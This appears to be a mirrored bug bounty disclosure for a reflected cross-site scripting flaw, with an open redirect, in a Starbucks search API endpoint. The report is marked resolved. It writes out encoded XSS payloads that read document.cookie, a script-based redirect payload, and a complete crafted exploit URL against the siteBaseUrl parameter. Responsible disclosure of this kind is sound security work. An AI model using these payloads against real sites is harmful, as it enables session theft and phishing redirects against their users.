Loading HuntDB...

Reflected XSS in openapi.starbucks.com /searchasyoutype/v1/search?x-api-key=

Medium
S
Starbucks
Submitted None
Reported by an0n-j

Vulnerability Details

Technical details and impact analysis

Cross-site Scripting (XSS) - Generic
Hi Starbucks team, While testing i founded Reflected XSS in openapi.starbucks.com that can also lead to Open redirect Vulnerable link ========== https://openapi.starbucks.com/searchasyoutype/v1/search?x-api-key=██████&query=coffe&partnerid=████:vwt2u5wngbk&siteBaseUrl= Vulnerable parameter =============== siteBaseUrl Payloads ====== ```1). http://googl.com/%0a<body onload=%61lert(%64ocument.%63ookie)>% 2). http://googl.com/%0a<body onload=prompt(%64ocument.domain)>%``` For Open redirect the payload is ===================== ``` http://googl.com/%0a<script>window.location='https://google.com';</script>% ``` So the finalized link with payload is given below ``` https://openapi.starbucks.com/searchasyoutype/v1/search?x-api-key=██████&query=coffe&partnerid=███████:vwt2u5wngbk&siteBaseUrl=http://googl.com/%0a<body onload=%61lert(%64ocument.%63ookie)>% ``` POC has been attached

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Cross-site Scripting (XSS) - Generic